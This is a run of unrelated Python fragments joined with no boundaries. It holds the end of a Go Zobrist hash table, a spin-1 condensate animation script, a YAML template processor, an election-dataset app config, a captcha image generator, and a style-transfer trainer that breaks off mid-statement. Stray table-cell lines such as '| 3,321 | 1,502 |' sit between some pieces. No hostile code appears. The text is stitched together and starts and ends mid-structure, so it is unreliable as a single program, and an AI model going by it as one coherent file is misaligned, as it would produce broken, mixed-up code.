(Point(row=14, col=16), Player.black): 6495330481411294612,
(Point(row=14, col=16), Player.white): 4678318561357907878,
(Point(row=14, col=17), Player.black): 1613163634528474933,
(Point(row=14, col=17), Player.white): 2149394070598892722,
(Point(row=14, col=18), Player.black): 3613731393981415918,
(Point(row=14, col=18), Player.white): 670492166825950545,
(Point(row=14, col=19), Player.black): 3576884676864696223,
(Point(row=14, col=19), Player.white): 8013845603496590037,
(Point(row=15, col=1), Player.black): 4444720605802559994,
(Point(row=15, col=1), Player.white): 4690308037902459056,
(Point(row=15, col=2), Player.black): 198794688626774049,
(Point(row=15, col=2), Player.white): 754101414028084990,
(Point(row=15, col=3), Player.black): 9031834267182088450,
(Point(row=15, col=3), Player.white): 4955142136487065963,
(Point(row=15, col=4), Player.black): 5950356114654535765,
(Point(row=15, col=4), Player.white): 1673708508551501787,
(Point(row=15, col=5), Player.black): 3059942019337751169,
(Point(row=15, col=5), Player.white): 6236001435181494065,
(Point(row=15, col=6), Player.black): 3840642542836249231,
(Point(row=15, col=6), Player.white): 4494437239109309561,
(Point(row=15, col=7), Player.black): 3418524991248282035,
(Point(row=15, col=7), Player.white): 4088710049109644123,
(Point(row=15, col=8), Player.black): 3370871771055988106,
(Point(row=15, col=8), Player.white): 6205297688850580126,
(Point(row=15, col=9), Player.black): 2729132856797520113,
(Point(row=15, col=9), Player.white): 1872963579855844925,
(Point(row=15, col=10), Player.black): 4796469616123085704,
(Point(row=15, col=10), Player.white): 2737956312985495735,
(Point(row=15, col=11), Player.black): 7425165379650361569,
(Point(row=15, col=11), Player.white): 4744913956310027049,
(Point(row=15, col=12), Player.black): 4432452777664043550,
(Point(row=15, col=12), Player.white): 7149390510594997576,
(Point(row=15, col=13), Player.black): 1127377434164446909,
(Point(row=15, col=13), Player.white): 7139372936332834674,
(Point(row=15, col=14), Player.black): 8623185287159014896,
(Point(row=15, col=14), Player.white): 2749311309393092071,
(Point(row=15, col=15), Player.black): 3889399041204032560,
(Point(row=15, col=15), Player.white): 5440568414932730887,
(Point(row=15, col=16), Player.black): 7961130044126580240,
(Point(row=15, col=16), Player.white): 5522153684761811918,
(Point(row=15, col=17), Player.black): 1051894275733779402,
(Point(row=15, col=17), Player.white): 7775123139195000322,
(Point(row=15, col=18), Player.black): 405047372528169449,
(Point(row=15, col=18), Player.white): 6777693792695027781,
(Point(row=15, col=19), Player.black): 2707900765333949110,
(Point(row=15, col=19), Player.white): 1748580443724313214,
(Point(row=16, col=1), Player.black): 2310585590428078863,
(Point(row=16, col=1), Player.white): 4217038584119906912,
(Point(row=16, col=2), Player.black): 985202624705196243,
(Point(row=16, col=2), Player.white): 9151409094950142193,
(Point(row=16, col=3), Player.black): 750140955532969349,
(Point(row=16, col=3), Player.white): 2226854903279338690,
(Point(row=16, col=4), Player.black): 1753443221335135301,
(Point(row=16, col=4), Player.white): 112641559000638460,
(Point(row=16, col=5), Player.black): 2469310201348258380,
(Point(row=16, col=5), Player.white): 2933066886110832647,
(Point(row=16, col=6), Player.black): 8760290595356794758,
(Point(row=16, col=6), Player.white): 3938325596318156201,
(Point(row=16, col=7), Player.black): 351392362800699236,
(Point(row=16, col=7), Player.white): 5965923125256290133,
(Point(row=16, col=8), Player.black): 4226241391525466462,
(Point(row=16, col=8), Player.white): 2296189491115798113,
(Point(row=16, col=9), Player.black): 5818906966146137497,
(Point(row=16, col=9), Player.white): 2978814809930535951,
(Point(row=16, col=10), Player.black): 5221313999467075534,
(Point(row=16, col=10), Player.white): 5525586090026314079,
(Point(row=16, col=11), Player.black): 7150888125699917692,
(Point(row=16, col=11), Player.white): 7967098806646820797,
(Point(row=16, col=12), Player.black): 2809819457402689956,
(Point(row=16, col=12), Player.white): 7425517738724027933,
(Point(row=16, col=13), Player.black): 9043041476972987773,
(Point(row=16, col=13), Player.white): 4126568890528841830,
(Point(row=16, col=14), Player.black): 405195601380630992,
(Point(row=16, col=14), Player.white): 2859364994541233088,
(Point(row=16, col=15), Player.black): 9100706054278752322,
(Point(row=16, col=15), Player.white): 2698432353369862483,
(Point(row=16, col=16), Player.black): 233570791189122902,
(Point(row=16, col=16), Player.white): 1955797661194269678,
(Point(row=16, col=17), Player.black): 3215444208293145815,
(Point(row=16, col=17), Player.white): 7749899566907810501,
(Point(row=16, col=18), Player.black): 4434257155996611207,
(Point(row=16, col=18), Player.white): 5524138211073814901,
(Point(row=16, col=19), Player.black): 3879442844657515242,
(Point(row=16, col=19), Player.white): 4095000128396542164,
(Point(row=17, col=1), Player.black): 3117304355126357036,
(Point(row=17, col=1), Player.white): 8288379997552988803,
(Point(row=17, col=2), Player.black): 5322299816902250572,
(Point(row=17, col=2), Player.white): 7955260886908761297,
(Point(row=17, col=3), Player.black): 7425435021255007715,
(Point(row=17, col=3), Player.white): 3941956462330213296,
(Point(row=17, col=4), Player.black): 1667932789968984978,
(Point(row=17, col=4), Player.white): 7761984596295380582,
(Point(row=17, col=5), Player.black): 2614708018742137051,
(Point(row=17, col=5), Player.white): 5622728983365429270,
(Point(row=17, col=6), Player.black): 3166135214757456351,
(Point(row=17, col=6), Player.white): 1820234063889877538,
(Point(row=17, col=7), Player.black): 7600848454149943870,
(Point(row=17, col=7), Player.white): 2753551240055896921,
(Point(row=17, col=8), Player.black): 1106934710738997852,
(Point(row=17, col=8), Player.white): 4526974971888515393,
(Point(row=17, col=9), Player.black): 6549127170110706395,
(Point(row=17, col=9), Player.white): 5670307432083885437,
(Point(row=17, col=10), Player.black): 7309255636469744981,
(Point(row=17, col=10), Player.white): 4822125742706822460,
(Point(row=17, col=11), Player.black): 7220686973131194088,
(Point(row=17, col=11), Player.white): 3764391926682480440,
(Point(row=17, col=12), Player.black): 2913903513213258547,
(Point(row=17, col=12), Player.white): 6507070047539847251,
(Point(row=17, col=13), Player.black): 7872528269466684417,
(Point(row=17, col=13), Player.white): 4192693152170512736,
(Point(row=17, col=14), Player.black): 4559365332905827812,
(Point(row=17, col=14), Player.white): 3554627099004559818,
(Point(row=17, col=15), Player.black): 2545070106672825097,
(Point(row=17, col=15), Player.white): 401721397973562050,
(Point(row=17, col=16), Player.black): 1915725896509292407,
(Point(row=17, col=16), Player.white): 9157259484226467403,
(Point(row=17, col=17), Player.black): 8198919660148798022,
(Point(row=17, col=17), Player.white): 6675520034574308988,
(Point(row=17, col=18), Player.black): 5572663870847872100,
(Point(row=17, col=18), Player.white): 6316773736280904464,
(Point(row=17, col=19), Player.black): 4388687526018013997,
(Point(row=17, col=19), Player.white): 3586033991605775080,
(Point(row=18, col=1), Player.black): 4613449893232649289,
(Point(row=18, col=1), Player.white): 3861903736492753207,
(Point(row=18, col=2), Player.black): 3202758646651797984,
(Point(row=18, col=2), Player.white): 4133094515312691565,
(Point(row=18, col=3), Player.black): 5426472657376008387,
(Point(row=18, col=3), Player.white): 655369761575316671,
(Point(row=18, col=4), Player.black): 2077728647251025218,
(Point(row=18, col=4), Player.white): 6123792056065592311,
(Point(row=18, col=5), Player.black): 8817000461345714312,
(Point(row=18, col=5), Player.white): 7398451604017428982,
(Point(row=18, col=6), Player.black): 4740990483507680922,
(Point(row=18, col=6), Player.white): 226766346004950653,
(Point(row=18, col=7), Player.black): 4297852790462069905,
(Point(row=18, col=7), Player.white): 2197353642346969827,
(Point(row=18, col=8), Player.black): 3629856433750791325,
(Point(row=18, col=8), Player.white): 8608402781860824733,
(Point(row=18, col=9), Player.black): 7679472870378645470,
(Point(row=18, col=9), Player.white): 3129117740892945656,
(Point(row=18, col=10), Player.black): 6022746329655441342,
(Point(row=18, col=10), Player.white): 6053662240788938043,
(Point(row=18, col=11), Player.black): 5612608898331419920,
(Point(row=18, col=11), Player.white): 8095509113662719358,
(Point(row=18, col=12), Player.black): 7366806444887424607,
(Point(row=18, col=12), Player.white): 8722702568187767742,
(Point(row=18, col=13), Player.black): 7576913276828070602,
(Point(row=18, col=13), Player.white): 975355406767794881,
(Point(row=18, col=14), Player.black): 4558952012254833057,
(Point(row=18, col=14), Player.white): 7453093514862056338,
(Point(row=18, col=15), Player.black): 2603655647783102532,
(Point(row=18, col=15), Player.white): 8360947937606696580,
(Point(row=18, col=16), Player.black): 2380048416754120672,
(Point(row=18, col=16), Player.white): 6190351435507898305,
(Point(row=18, col=17), Player.black): 4230604829929423542,
(Point(row=18, col=17), Player.white): 3855327000552344147,
(Point(row=18, col=18), Player.black): 333673637459411756,
(Point(row=18, col=18), Player.white): 2465187608717265538,
(Point(row=18, col=19), Player.black): 6268429878451399082,
(Point(row=18, col=19), Player.white): 6548297594224631467,
(Point(row=19, col=1), Player.black): 4847546886605869626,
(Point(row=19, col=1), Player.white): 1467219893557249016,
(Point(row=19, col=2), Player.black): 8265836827786570713,
(Point(row=19, col=2), Player.white): 1310557064505780387,
(Point(row=19, col=3), Player.black): 4261541966886236370,
(Point(row=19, col=3), Player.white): 4303938384049567829,
(Point(row=19, col=4), Player.black): 5951641827131677319,
(Point(row=19, col=4), Player.white): 4042199037642727955,
(Point(row=19, col=5), Player.black): 207646346159424554,
(Point(row=19, col=5), Player.white): 4135202834450329273,
(Point(row=19, col=6), Player.black): 382133973552173016,
(Point(row=19, col=6), Player.white): 3559829303112288905,
(Point(row=19, col=7), Player.black): 2266136181192524665,
(Point(row=19, col=7), Player.white): 3817237075629846954,
(Point(row=19, col=8), Player.black): 2610525566275870438,
(Point(row=19, col=8), Player.white): 1273827977819700249,
(Point(row=19, col=9), Player.black): 26273397228875002,
(Point(row=19, col=9), Player.white): 7375330758892600621,
(Point(row=19, col=10), Player.black): 8752487231531749057,
(Point(row=19, col=10), Player.white): 8126550380346161414,
(Point(row=19, col=11), Player.black): 5618797351671764015,
(Point(row=19, col=11), Player.white): 5040907570519819462,
(Point(row=19, col=12), Player.black): 9120690258999923218,
(Point(row=19, col=12), Player.white): 7747977604704742878,
(Point(row=19, col=13), Player.black): 8175024806705415540,
(Point(row=19, col=13), Player.white): 6029597491063011802,
(Point(row=19, col=14), Player.black): 2042107275912665033,
(Point(row=19, col=14), Player.white): 5791689611226912136,
(Point(row=19, col=15), Player.black): 1062710851838635153,
(Point(row=19, col=15), Player.white): 4149047099440364178,
(Point(row=19, col=16), Player.black): 897650112570198107,
(Point(row=19, col=16), Player.white): 2430368125342031745,
(Point(row=19, col=17), Player.black): 6124238047959944916,
(Point(row=19, col=17), Player.white): 8173927967552829761,
(Point(row=19, col=18), Player.black): 5747036537194470761,
(Point(row=19, col=18), Player.white): 3102757242878139008,
(Point(row=19, col=19), Player.black): 766659392679871184,
(Point(row=19, col=19), Player.white): 7268838751129184476,
}
EMPTY_BOARD = 0  # Zobrist hash of a board with no stones (identity element for XOR).
import h5py
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
# Load in data:
filename = input('Enter data filename: ')
data_file = h5py.File('../../data/{}.hdf5'.format(filename), 'r')
# Wavefunction components (h5py datasets indexed [x, y, frame]; read lazily
# from disk). The +/0/- naming suggests a spin-1 condensate -- consistent
# with the "spin-1" plot directory used at the end of this script.
psi_plus = data_file['wavefunction/psi_plus']
psi_0 = data_file['wavefunction/psi_0']
psi_minus = data_file['wavefunction/psi_minus']
# Other variables:
x, y = data_file['grid/x'], data_file['grid/y']
dx, dy = x[1] - x[0], y[1] - y[0]  # grid spacing (assumes a uniform grid)
X, Y = np.meshgrid(x[:], y[:])
# Loading time variables:
Nt, dt, Nframe = np.array(data_file['time/Nt']), np.array(data_file['time/dt']), np.array(data_file['time/Nframe'])
num_of_frames = psi_plus.shape[-1]
# Calculate initial spin expectation:
# dens = total density; Fz = longitudinal spin density |psi+|^2 - |psi-|^2;
# F_perp = transverse spin density sqrt(2)(psi+* psi0 + psi0* psi-).
dens = abs(psi_plus[:, :, 0]) ** 2 + abs(psi_0[:, :, 0]) ** 2 + abs(psi_minus[:, :, 0]) ** 2
F_perp = np.sqrt(2) * (np.conj(psi_plus[:, :, 0]) * psi_0[:, :, 0] + np.conj(psi_0[:, :, 0]) * psi_minus[:, :, 0])
Fz = abs(psi_plus[:, :, 0]) ** 2 - abs(psi_minus[:, :, 0]) ** 2
# |<F>| normalised by the local density.
spin_expec_mag = np.sqrt(Fz ** 2 + abs(F_perp) ** 2) / dens
# Set up figure: three panels sharing the y-axis.
fig, ax = plt.subplots(1, 3, sharey=True, figsize=(10, 10))
ax[0].set_ylabel(r'$y / \xi_s$')
ax[0].set_title(r'$|\psi_+|^2$')
ax[1].set_title(r'$|\psi_-|^2$')
ax[2].set_title(r'$|<\vec{F}>|$')
for axis in ax:
    axis.set_xlabel(r'$x / \xi_s$')
# Fixed contour levels shared by every frame, so colours are comparable.
cvals_dens = np.linspace(0, 1, 25, endpoint=True)
cvals_spin = np.linspace(0, 1, 25, endpoint=True)
# Initial frame plot:
densPlus_plot = ax[0].contourf(X, Y, abs(psi_plus[:, :, 0]) ** 2, cvals_dens, cmap='gnuplot')
densMinus_plot = ax[1].contourf(X, Y, abs(psi_minus[:, :, 0]) ** 2, cvals_dens, cmap='gnuplot')
spin_plot = ax[2].contourf(X, Y, spin_expec_mag, cvals_spin, cmap='PuRd')
# The contour sets are kept so animate() can remove them each frame.
cont = [densPlus_plot, densMinus_plot, spin_plot]
# Set up color bars:
dens_cbar = plt.colorbar(densMinus_plot, ax=ax[1], fraction=0.044, pad=0.03)
phase_cbar = plt.colorbar(spin_plot, ax=ax[2], ticks=[0, 1], fraction=0.044, pad=0.03)
for axis in ax:
    axis.set_aspect('equal')
# Annotation with the simulation parameters (data coordinates -- assumes the
# plotted domain covers this position; TODO confirm for other datasets).
plt.text(-100, 400, r'$n_0 = 1, c_0 = 3.5, c_2 = 0.5$')
def animate(i):
    """Draw frame *i*: component densities and spin-expectation magnitude.

    Removes the previous frame's contour artists, re-draws all three
    panels for frame ``i`` and updates the title with the current time.
    Returns the list of new contour sets.
    """
    global cont
    # Remove the artists drawn for the previous frame.
    for contour in cont:
        for c in contour.collections:
            c.remove()
    plus_plot = ax[0].contourf(X, Y, abs(psi_plus[:, :, i]) ** 2, cvals_dens, cmap='gnuplot')
    minus_plot = ax[1].contourf(X, Y, abs(psi_minus[:, :, i]) ** 2, cvals_dens, cmap='gnuplot')
    # Calculate spin expectation (same formulas as the initial frame):
    dens = abs(psi_plus[:, :, i]) ** 2 + abs(psi_0[:, :, i]) ** 2 + abs(psi_minus[:, :, i]) ** 2
    F_perp = np.sqrt(2) * (np.conj(psi_plus[:, :, i]) * psi_0[:, :, i] + np.conj(psi_0[:, :, i]) * psi_minus[:, :, i])
    Fz = abs(psi_plus[:, :, i]) ** 2 - abs(psi_minus[:, :, i]) ** 2
    spin_expec_mag = np.sqrt(Fz ** 2 + abs(F_perp) ** 2) / dens
    spin_plot = ax[2].contourf(X, Y, spin_expec_mag, cvals_spin, cmap='PuRd')
    # FIX: store the contour sets returned by contourf (as the initial
    # frame does). The original stored the Axes objects, which only
    # worked by accident because Axes also expose a `.collections` list.
    cont = [plus_plot, minus_plot, spin_plot]
    print('On density iteration %i' % (i + 1))
    # FIX: '%.2f' (two decimal places) -- the original '%2f' only set a
    # minimum field width of 2 and printed full float precision.
    plt.suptitle(r'$\tau$ = %.2f' % (Nframe * dt * i), y=0.7)
    return cont
# Calls the animation function and saves the result
anim = animation.FuncAnimation(fig, animate, frames=num_of_frames, repeat=False)
# filename[7:] drops the first seven characters of the entered name --
# presumably a fixed prefix in the data naming scheme; TODO confirm.
anim.save('../../../plots/spin-1/{}.mp4'.format(filename[7:]), dpi=200,
          writer=animation.FFMpegWriter(fps=60, codec="libx264", extra_args=['-pix_fmt', 'yuv420p']))
print('Density video saved successfully.')
| 3,321 | 1,502 |
import attr
import yaml
from boltun.engine import Engine
@attr.s
class YamlProcessor(object):
    """Renders scalar YAML nodes through a boltun template Engine.

    Register with ``__enable__``: the instance itself is installed as the
    PyYAML constructor for *tag*, and (optionally) as the implicit
    resolver for untagged scalars.
    """
    engine = attr.ib(default=attr.Factory(Engine))

    def __enable__(self, tag="!boltun", resolver=False):
        """Register this processor with PyYAML under *tag*."""
        yaml.add_constructor(tag, self)
        if resolver:
            # FIX: add_implicit_resolver expects a regex-like object that
            # exposes ``.match`` (PyYAML calls ``regexp.match(value)``).
            # The original passed the bound method ``self._match``, whose
            # ``.match`` attribute does not exist, so resolution raised
            # AttributeError. Passing ``self`` works because the class now
            # provides a ``match`` method (below).
            yaml.add_implicit_resolver(tag, self)

    def __call__(self, loader, node, **kwargs):
        """PyYAML constructor hook: render the node's scalar value."""
        return self.engine.render(node.value)

    def match(self, input_):
        """Duck-type ``re.Pattern.match`` for the implicit resolver.

        Truthy when *input_* parses as a boltun template, falsy otherwise.
        """
        try:
            template = self.engine.create_template(input_)
        except Exception:
            return False
        return bool(template)

    # Backward-compatible alias for the previous private name.
    _match = match
| 618 | 186 |
from abstract.apps import AbstractConfig
from .loader import CVK2015Loader
from .elastic_models import ElasticCVK2015Model, cvk_2015_idx
class CVK2015Config(AbstractConfig):
    """App configuration for the 2015 local-election (CVK) dataset."""

    name = "cvk_2015"
    verbose_name = "Учасники місцевих виборів 2015-го року"
    short_name = "Регіони"
    loader_class = CVK2015Loader

    @property
    def data_model(self):
        """Django model for this dataset, imported lazily.

        The deferred import breaks a circular dependency with .models.
        """
        from .models import CVK2015Model
        return CVK2015Model

    @property
    def sitemap(self):
        """Sitemap class, imported lazily for the same circular-import reason."""
        from .sitemaps import CVK2015Sitemap
        return CVK2015Sitemap

    elastic_model = ElasticCVK2015Model
    elastic_index = cvk_2015_idx
# -*- coding: UTF-8 -*-
"""
使用PIL lib生成验证码(前提:pip install PIL)
"""
from PIL import Image,ImageFont,ImageDraw,ImageFilter
import os
import random
import time
import json
def gen_special_img(text, file_path, width, height):
    """Render *text* centred on a solid background and save it.

    args:
        text: string to draw on the image
        file_path: destination path (its extension selects the format)
        width, height: image size in pixels
    """
    fontSize = 16
    backGroundColor = (102,142,107)
    fontColor = (112,66,60)
    font = ImageFont.truetype('./simhei.ttf', fontSize)
    img = Image.new('RGBA',(width,height), backGroundColor)
    # NOTE(review): ImageFont.getsize() was deprecated and removed in
    # Pillow 10 -- switch to font.getbbox()/draw.textbbox() on upgrade.
    textWidth, textHeight = font.getsize(text)
    # Centre the text; the -2 nudges it slightly upward.
    textLeft = (width-textWidth)/2
    textTop = (height-textHeight)/2-2
    draw = ImageDraw.Draw(img)
    draw.text(xy=(textLeft,textTop),text=text,fill=fontColor,font=font)
    # rotate(0) is effectively a copy; kept to preserve the original
    # composite behaviour (rot's alpha channel acts as the mask).
    # FIX: removed a bare no-op statement `img.rotate` (attribute access
    # whose result was discarded) that followed this line.
    rot = img.rotate(0,expand=0)
    fff = Image.new('RGBA', rot.size,backGroundColor)
    img = Image.composite(rot, fff, rot)
    img.save(file_path)  # write the image to disk
def gen_ima_by_batch(root_dir, image_suffix, characters, count, char_count, width, height):
    """Generate *count* captcha images under *root_dir*.

    Each file is named "<text>_<timestamp>.<image_suffix>", where <text>
    is one random uppercase ASCII letter followed by *char_count*
    characters drawn from *characters*.
    """
    # Create the output directory if it does not exist yet.
    if not os.path.exists(root_dir):
        os.makedirs(root_dir)
    # FIX: dropped the redundant enumerate(range(count)) (index == i) and
    # a duplicated commented-out generation loop.
    for index in range(count):
        # Random uppercase prefix letter: chr(65)-chr(90) is 'A'-'Z'.
        add_al = chr(random.randrange(65, 91))
        text = add_al + "".join(random.choice(characters) for _ in range(char_count))
        # Timestamp (dots stripped) keeps file names unique.
        timec = str(time.time()).replace(".", "")
        p = os.path.join(root_dir, "{}_{}.{}".format(text, timec, image_suffix))
        gen_special_img(text, p, width, height)
        print("Generate captcha image => {}".format(index + 1))
def main():
    """Read conf/captcha_config.json and batch-generate captcha samples."""
    with open("conf/captcha_config.json", "r") as config_file:
        config = json.load(config_file)
    # Configuration parameters:
    root_dir = config["root_dir"]          # directory the images are written to
    image_suffix = config["image_suffix"]  # image file extension
    characters = config["characters"]      # character pool, e.g. "0123456789abc...xyz"
    count = config["count"]                # how many samples to generate
    char_count = config["char_count"]      # characters per image (plus the prefix letter)
    # Image dimensions:
    width = config["width"]
    height = config["height"]
    gen_ima_by_batch(root_dir, image_suffix, characters, count,
                     char_count, width, height)
# Script entry point.
if __name__ == '__main__':
    main()
| 2,296 | 929 |
import os
import time
import csv
import pickle
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data.dataloader import DataLoader
from torch.nn.utils import clip_grad_norm_ as clip_grad_norm
from sklearn.metrics import accuracy_score
import matplotlib.pyplot as plt
from utils import tokenization, optimization, constants, misc
from utils.data import *
from utils.evaluator import BLEUEvaluator
def get_transfer_data(data_dir, data_name):
    """
    args:
        data_dir: str
        data_name: str
    return:
        data: dict of {"src_str": list of str, "lab": list of int}

    Reads "<data_name>.0" and "<data_name>.1" from *data_dir*; sentences
    from file ``.s`` get label ``s``. Style-0 sentences come first.
    """
    sources, labels = [], []
    for style in (0, 1):
        path = os.path.join(data_dir, data_name + ".{}".format(style))
        with open(path, 'r') as handle:
            stripped = [line.strip() for line in handle]
        sources.extend(stripped)
        labels.extend([style] * len(stripped))
    assert len(sources) == len(labels)
    data = {"src_str": sources, "lab": labels}
    print("%s data has been loaded" % data_name)
    # Report the per-label sentence counts.
    for l, count in enumerate(np.bincount(data["lab"])):
        print("number of label %d: %d" % (l, count))
    return data
def load_and_cache_data(args, data_name, tokenizer):
    """
    return:
        data: dict of {"src_str": list of str,
                       "src_ind": list of int,
                       "lab": list of int}

    Loads the transfer data, tokenizes it (optionally wrapping each
    sentence with SOS/EOS), and caches the result with torch.save so
    later runs skip the preprocessing.
    """
    sos_str = "_sos" if args.use_sos else ""
    eos_str = "_eos" if args.use_eos else ""
    mask_str = "_mask" if "mask" in args.vocab_file_name else ""
    cached_data_file = os.path.join(
        args.data_dir,
        f"cached_transfer_{data_name}{sos_str}{eos_str}{mask_str}"
    )
    if os.path.exists(cached_data_file) and not args.overwrite_cache:
        print("Loading data from cached data file %s" % cached_data_file)
        return torch.load(cached_data_file)
    print("Creating cached data file from data at %s" % cached_data_file)
    data = get_transfer_data(args.data_dir, data_name)
    # Optional sentence delimiters, applied uniformly below. When both
    # lists are empty, ' '.join([text]) == text, so the no-delimiter case
    # is unchanged.
    id_prefix = [tokenizer.SOS_ID] if args.use_sos else []
    id_suffix = [tokenizer.EOS_ID] if args.use_eos else []
    tok_prefix = [tokenizer.SOS_TOKEN] if args.use_sos else []
    tok_suffix = [tokenizer.EOS_TOKEN] if args.use_eos else []
    index_src, str_src = [], []
    for text in data['src_str']:
        index_src.append(id_prefix + tokenizer.encode(text) + id_suffix)
        str_src.append(' '.join(tok_prefix + [text] + tok_suffix))
    data['src_ind'] = index_src
    data['src_str'] = str_src
    torch.save(data, cached_data_file)
    return data
def lambda_schedule(num_iter, start=0.0, stop=1.0, ratio=0.1):
    """Linear warm-up schedule over *num_iter* steps.

    The weight ramps linearly from *start* to *stop* over the first
    ``ratio`` fraction of the steps and stays at *stop* afterwards.

    args:
        num_iter: total number of steps
        start: value at step 0
        stop: plateau value after warm-up
        ratio: fraction of steps spent ramping
    return:
        np.ndarray of length num_iter
    """
    lambdas = np.ones(num_iter) * stop
    progress_interval = num_iter * ratio
    for i in range(int(progress_interval)):
        # FIX: the original ignored *start* (lambdas[i] *= i / interval),
        # always ramping from 0. Interpolate start -> stop instead; with
        # the default start=0.0 this reproduces the old behaviour.
        lambdas[i] = start + (stop - start) * (i / progress_interval)
    return lambdas
class BasicTrainer:
    """
    Basic Trainer.

    Holds the model, its dataloaders and the optimizer/scheduler pair,
    and defines the train/evaluate/test interface that subclasses
    implement.
    """
    def __init__(self, args, model, train_data=None, dev_data=None, test_data=None,
                 tokenizer=None):
        self.args = args
        self.model = model
        self.optimizer = None
        self.scheduler = None
        # Build dataloaders only for the splits that were supplied.
        self.train_dataloader = self.get_dataloader(train_data, "train")\
            if train_data else None
        self.dev_dataloader = self.get_dataloader(dev_data, "dev")\
            if dev_data else None
        self.test_dataloader = self.get_dataloader(test_data, "test")\
            if test_data else None
        # An optimizer is only needed when there is training data.
        if self.train_dataloader:
            self.optimizer, self.scheduler = self.get_optimizer()

    def get_dataloader(self, data, data_name):
        """Wrap a data dict into a DataLoader; only "train" may shuffle.

        args:
            data: dict with "src_ind" (token-id lists) and "lab" (labels)
            data_name: "train", "dev" or "test"
        """
        args = self.args
        if data_name == "train":
            shuffle = args.shuffle
            batch_size = args.batch_size
        else:
            shuffle = False
            # batch_size = 2
            batch_size = args.batch_size
        dataset = ClassifierDataset(data["src_ind"], data["lab"])
        # FIX: use the per-split batch_size selected above. The original
        # passed args.batch_size directly, leaving the local unused and
        # silently ignoring any per-split override.
        dataloader = DataLoader(dataset=dataset,
                                batch_size=batch_size,
                                shuffle=shuffle,
                                num_workers=args.num_workers,
                                collate_fn=ClassifierPaddingCollate)
        return dataloader

    def get_optimizer(self):
        """Create the optimizer and LR schedule.

        Side effect: stores the total optimizer-step count in
        args.num_steps. The LR is constant, optionally decaying linearly
        from step len(train) * args.decay_epoch.
        """
        args = self.args
        model = self.model
        train_dataloader = self.train_dataloader
        optimizer = optimization.get_optim(args, model.parameters())
        num_steps = len(train_dataloader) * args.num_train_epochs
        args.num_steps = num_steps
        print("Total number of steps: %d" % num_steps)
        decay_step = len(train_dataloader) * args.decay_epoch
        if args.decay_epoch > 0:
            print("Step when lr starts to decay: %d" % decay_step)
            scheduler = optimization.get_constant_schedule_with_linear_decay(
                optimizer, decay_step=decay_step, num_training_steps=num_steps
            )
        else:
            scheduler = optimization.get_constant_schedule(optimizer)
        return optimizer, scheduler

    def save_checkpoint(self, path):
        """Persist the model weights under *path*.

        Saving args/optimizer/scheduler state is deliberately disabled.
        """
        # torch.save(self.args, os.path.join(path, "args.pt"))
        torch.save(self.model.state_dict(), os.path.join(path, "model_state_dict.pt"))
        # torch.save(self.optimizer.state_dict(), os.path.join(path, "optimizer_state_dict.pt"))
        # torch.save(self.scheduler.state_dict(), os.path.join(path, "scheduler_state_dict.pt"))
        return

    def train(self):
        raise NotImplementedError()

    def evaluate(self):
        raise NotImplementedError()

    def test(self):
        raise NotImplementedError()

    def save_train_result(self, train_record, eval_record):
        """Log the best BLEU and plot loss/BLEU curves to args.output_dir.

        args:
            train_record: list of per-step training losses
            eval_record: (list of BLEU scores, list of global steps)
        return:
            (best BLEU, global step at which it occurred)
        """
        args = self.args
        train_loss_record = train_record
        eval_bleu_record, eval_gs_record = eval_record
        best_bleu = np.max(eval_bleu_record)
        step_of_best_bleu = eval_gs_record[np.argmax(eval_bleu_record)]
        print("best BLEU: %.4f in step %d" % (best_bleu, step_of_best_bleu))
        with open(os.path.join(args.output_dir, "training_result.log"), 'w') as f:
            f.write("best BLEU: %.4f in step %d" % (best_bleu, step_of_best_bleu))
        # BLEU vs. global step.
        plt.figure()
        plt.xlabel("step")
        plt.ylabel("BLEU")
        plt.plot(eval_gs_record, eval_bleu_record)
        plt.tight_layout()
        plt.savefig(os.path.join(args.output_dir, "bleu.pdf"), format='pdf')  # bbox_inches='tight'
        # Training loss vs. step index.
        plt.figure()
        plt.xlabel("step")
        plt.ylabel("loss")
        plt.plot(list(range(len(train_loss_record))), train_loss_record)
        # plt.plot(eval_gs_record, eval_loss_record)
        plt.tight_layout()
        plt.savefig(os.path.join(args.output_dir, "loss.pdf"), format='pdf')
        return best_bleu, step_of_best_bleu
class TransferModelTrainer(BasicTrainer):
def __init__(self, args, model, train_data=None, dev_data=None,
             test_data=None, **kwargs):
    """Trainer for the style-transfer model.

    Beyond BasicTrainer setup: optionally loads and freezes a pretrained
    classifier, rebuilds the optimizer over the non-classifier/LM
    parameters, loads an external CNN classifier for evaluation, and
    resolves the dev/test data and reference file paths.

    kwargs must contain "tokenizer".
    """
    super().__init__(
        args, model, train_data, dev_data, test_data
    )
    self.tokenizer = kwargs["tokenizer"]
    if self.args.cls_model_path:
        print(f"Load classifier model form {self.args.cls_model_path}")
        self.model.classifier.load_state_dict(
            torch.load(
                os.path.join(self.args.cls_model_path, "model_state_dict.pt")
            )
        )
        # Keep the pretrained classifier fixed during transfer training.
        self.model.freeze_cls()
    # args.cls_weight = 0.05
    # args.ca_weight = 0.0
    # args.bt_weight = 1.0
    self.use_caw_schedule = False
    # Discard the optimizer built by BasicTrainer over *all* parameters;
    # it is rebuilt below over the trainable subset only.
    del self.optimizer
    del self.scheduler
    if self.train_dataloader:
        params = []
        for k, v in self.model.named_parameters():
            # print("%s: %s" % (k, str(v.shape)))
            # Classifier and language-model parameters stay frozen.
            if "classifier" in k or "lm" in k:
                print("not optimize %s" % k)
            else:
                print("add params of %s to optimizer" % k)
                params.append(v)
        self.optimizer, self.scheduler\
            = self.get_optimizer(params)
    # torch.autograd.set_detect_anomaly(True)
    # External CNN classifier used for transfer-accuracy evaluation.
    # NOTE(review): torch.load unpickles arbitrary objects -- only load
    # checkpoints from a trusted source.
    self.clf_model = torch.load(args.cnn_clf_path).to(args.device)
    self.clf_model.eval()
    self.dev_ref_path_list = getattr(args, "dev_ref_path_list", None)
    self.test_ref_path_list = getattr(args, "test_ref_path_list", None)
    if self.test_ref_path_list is None:
        self.test_ref_path_list = self.args.ref_list
    print("self.dev_ref_path_list is")
    print(self.dev_ref_path_list)
    print("self.test_ref_path_list is")
    print(self.test_ref_path_list)
    # With BPE, self-references live in separate "self_ref.*" files.
    if not self.args.use_bpe:
        self.dev_data_path_list = [
            [os.path.join(self.args.data_dir, f"dev.{i}")] for i in range(2)
        ]
        self.test_data_path_list = [
            [os.path.join(self.args.data_dir, f"test.{i}")] for i in range(2)
        ]
    else:
        self.dev_data_path_list = [
            [os.path.join(self.args.data_dir, f"self_ref.dev.{i}")] for i in range(2)
        ]
        self.test_data_path_list = [
